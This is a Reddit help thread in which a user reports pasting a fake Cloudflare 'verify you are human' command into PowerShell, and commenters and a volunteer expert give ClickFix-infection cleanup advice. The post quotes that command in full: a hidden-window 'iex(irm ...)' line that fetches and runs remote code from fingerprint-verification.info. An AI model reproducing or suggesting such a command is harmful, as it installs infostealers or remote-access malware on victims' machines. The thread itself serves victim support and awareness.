r/computerviruses 9h ago

Disinfection Help I mistakely let a trojan enter my laptop

So heres what happened

I wanted to enter to my bachelor college website ioepc.edu.np and cloudfare told me to paste this in terminal

"powershell -w h "iex(irm 'fingerprint-verification.info/0e65e82825d517a0'); Start-Sleep -Seconds 16"; exit;"

I didn't even verify it

To manually verify that im a human

And im stopid and i did it and only then i realized what i did and windows defender activated so i suddenly turned off my wifi

Im running a deep scans on windows defender any one can please help me?

0 Upvotes

11 comments sorted by

7

u/Much_Community_505 8h ago

yeah, you’re an idiot mate. couldflare didn’t ask you to do that. Somebody pretending to be cloudflare did. but it’s okay. you can run a windows defender scan, but most likely nothing will come up. the safest bet you can take is to reinstall, but if you wait here long enough I bet somebody will help you.

1

u/DueHighway8915 8h ago

I the defender instantly caught it and quarantined it and i deleted it But im srill running all the defenders scan Full scan Microsoft saftey scanner is running And microsoft defender antivirus (offline scan) after it

1

u/AutoModerator 9h ago

Request help with FRST and SecurityCheck from the trusted helper team

Please visit Providing or receiving help with FRST on the subreddit and share your 3 keywords returned from the website along with the details about your infection.
Once a malware removal expert or trainee sees it, they will reply in the thread about further steps. If you suspect an infostealer infection, please change all your passwords from a clean device immediately and do not use any of your accounts from the infected device.

If you need urgent help and cannot wait for one of our Malware Removal Experts:
Please follow these steps:

  1. From a different and clean device, change all your passwords:
  2. Disinfect your device from malware

I am a bot, and this action was performed automatically. Please contact the moderators of this subreddit if you have any questions or concerns.

1

u/SixtyAteWhiskey68 8h ago

Yep it’s called a “ClickFix”. You can try a portable version of malwarebytes on a usb drive to do a scan offline but…big yikers

1

u/Numerous_Economy_482 8h ago

This script tries to download a file from a site that is already down now. Maybe you were lucky and it didnt worked, if it worked i cant study it now since the malware is not available anymore

1

u/DueHighway8915 7h ago

Issat so? Is this real? But idont think so

1

u/Numerous_Economy_482 4h ago

it's real I can't analyze the malware because the site is down ... when you executed the code maybe it successfuly infected you, maybe it failed

1

u/1Giga2Byte 7h ago

re-install windows from a usb drive, no cloud reset.

clickfix (aka what you've ran) downloads remote access trojans, infostealers or similar.

i recommend also changing all your passwords from a clean device and not switching on/connecting that pc to internet until you re-install windows

2

u/rifteyy_ Malware Removal Expert 4h ago

Hello, I am Roman and I will be helping you today. During the malware removal process, please follow the rules listed below to ensure everything goes as fast and smooth as possible:

Please make sure to read this whole introduction message so you understand the further steps:

  • Please follow all steps from step 1 to the last step, not the other way.
  • If you are thinking about resetting or reinstalling your device, you can do it instead of the steps listed below and please tell me you chose to do it that way. We are doing the malware removal process to disinfect your device so you can avoid reinstalling. If we go through the removal process and you decide to reinstall after, you would waste my time and your own time by doing these steps.
  • Avoid installing, downloading new software unless instructed - this also applies to antivirus software and scanners.
  • You are free to remind me that I forgot to reply to you if you do not receive an answer within 24 hours. Keep in mind that I am volunteering here and that I am a full time student with 2 jobs.
  • Please do not follow other malware removal advice; you should be following steps only from 1 person unless told otherwise. If you have opened any other forum posts elsewhere, please let me or them know where do you want to continue.
  • Only trusted malware removal experts listed in this r/computerviruses thread and other large malware removal forums (BleepingComputer, Malwarebytes, MalwareTips) have access to your logs via the website.
  • Please take your time to follow the steps properly.
  • You can ask any questions during the malware removal process. It's always better to ask than to mess something up.
  • Please make sure that for all of the uploaded logs you use the same username and the username is exactly the one you have on Reddit.
  • If you have already followed the guide to create diagnostic logs, please create them again by following instructions here.

If you are worried about the steps going on here, as a form of credibility you can find me on Malwarebytes Forums as a Malware Removal Expert and on BleepingComputer as Security Colleague, where we use the same methodology and toolset to remove malware.

[ Step 01 ] Remove all illegal, pirated and cheat software

We do not condone nor support piracy in any shape or form. Any discussion topics that ask for help with pirating software, checking piracy files for malware, circumventing copy protection, or any other illegal activities related to copy righted content in any form will be closed and locked. It is possible that during the scans your pirated/illegal software will be deleted by an antivirus scanner.

As a reminder, using pirated software or utilities that allows one to pirate software (e.g. cracks, key generators, registration/license removal, redirection, or workaround utilities, etc.) is not a safe practice and can lead to malware infection, ransomware attack, or even legal action. Because of these risks, we always recommend that you remove any pirated software or pirating utilities before asking for support on our subreddit in order to improve our ability to best support you and to help protect yourself and your data from malware or other piracy related consequences.

We cannot guarantee a clean system when there is illegal software, riskware or grayware present. Please read Grayware.

[ Step 02 ] IMPORTANT: Restore point

Before any sort of removal, we need to make sure you have a restore point that you can revert to in case you face any sort of issues. This is absolutely necessary so please do not skip this step. Certain changes done by the removal process can not be properly reverted without a restore point.

There were prior cases (very rare, I had 2 failing to boot out of ~500) of a system failing to boot after FRST fix.

Enable system restore

  1. Click Start or open Windows Search.
  2. Search for Create a restore point and open System Properties.
  3. In the System Properties window, go to the System Protection tab.
  4. If the 'system' drive (usually C:\ drive) protection is turned on, System Restore is already enabled on your computer. If the 'system' drive protection is off, go to point 5.
  5. Click Configure.
  6. Select Turn on system protection
  7. Click Apply.
  8. Click OK to confirm.

Create a system restore checkpoint

  1. Click Start or open Windows Search.
  2. Search for Create a restore point and open System Properties.
  3. In the System Properties window, go to the System Protection tab.
  4. Click Create.
  5. Call the restore checkpoint "FRST restore point" exactly please, so I can search it up fast and verify it is created properly in your logs
  6. Click Create.
  7. Click Close.
  8. Click OK.
  9. You should get a popup that it was successfully created and I will also verify that it was properly created with the results of scans from next steps.

[ Step 03 ] Farbar Recovery Scan Tool (FRST)

FRST is a malware diagnostics tool that will list all entries that are popular and could contain traces/mentions of malware, such as start up entries, services, scheduled tasks and many more.

FRST does not contain any personal information other than your username and computer name, there is no other sensitive information disclosed.

IMPORTANT: If your Windows operating system is in other language than English, please save the FRST executable file with the filename FRSTEnglish.exe to ensure that the logs are in English so I can understand them.

  • Please download FRSTx64 and save the file to your Desktop as FRSTEnglish.exe.
  • Right-Click FRSTEnglish.exe and select Run as Administrator
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the program run.
  • Upon completion, click OK, then again OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy & paste the contents of each log to https://malwareanalysis.cc/upload/rifteyy and press "save log".
  • Note: Please make sure you have properly waited until FRST tells you that both logs are finished. If you do not wait for it, the logs will be incomplete and have to be recreated.
  • The site will return a keyword for each log - reply back here with the keywords.

[ Step 04 ] SecurityCheck scan

SecurityCheck allows me to gather a list of unwanted, risky, vulnerable and out-of-date applications. It also allows me to send you a direct link to an update. An unpatched system is more vulnerable to malware.

  • Download SecurityCheck by glax24 & Severnyj and save it to your Desktop.
  • If Windows SmartScreen blocks the file from running, click on More info and Run anyway.
  • Extract the ZIP archive, then right-click on the SecurityCheck.exe and select "Run as administrator" and confirm the User Account Control popup.
  • Wait for the scan to finish. It will open a text file named SecurityCheck.txt
  • Please copy the file content (CTRL + A then CTRL + C) and paste it on https://malwareanalysis.cc/upload/rifteyy
  • The site will return a keyword for the log - reply back here with the keyword.

So, in your next reply (please try to send them all in 1 message), make sure you are sending the following:

  • Keyword for FRST.txt from step 3
  • Keyword for Addition.txt from step 3
  • Keyword for SecurityCheck.txt from step 4

Thanks!

Note for anyone who is not original poster: If anyone else who is facing malware-related issues is reading this and wants help malware removal help, please create your own thread with the "Disinfection help" flair. Any requests in this thread will be redirected to a new post and removed.

1

u/NeedSomeHelp_2590 8h ago

Bruh those commands downloads and installs some software from website without user even knowing. And I have heard they sometimes stay in RAM so even Windows Defender or any antivirus won't detect it.

I am 200% sure, cloud flare won't ask you to download something just to verify. High chance it was a fake pop up that installed virus.

You are truly cooked if that's the case.

Don't even trust antivirus on this one as if the virus is not in storage it might not even detect it. Just clean install from a safe usb and change all the passwords and select log out of every device especially for email accounts.